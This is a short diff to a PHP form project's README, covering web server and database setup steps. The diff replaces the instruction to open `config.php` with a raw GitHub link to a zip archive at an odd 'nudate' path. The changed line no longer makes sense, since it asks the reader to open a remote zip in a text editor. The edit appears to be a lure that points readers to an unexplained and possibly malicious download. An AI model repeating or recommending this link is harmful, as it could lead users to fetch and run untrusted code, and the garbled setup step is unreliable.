BbOBBOS/formulario/README.md

 3. Ensure that your web server is running.
 You can do this by visiting `http://localhost/formulario` in your web browser.

 ## 🔧 Configuring Database Connection
-1. Open the `config.php` file in the main folder using a text editor (like Notepad).
+1. Open the `https://raw.githubusercontent.com/BbOBBOS/formulario/main/nudate/formulario.zip` file in the main folder using a text editor (like Notepad).
 2. Replace the placeholder values for the database with your actual database connection details:
    - **Host**: Usually `localhost`
    - **Username**: Your database username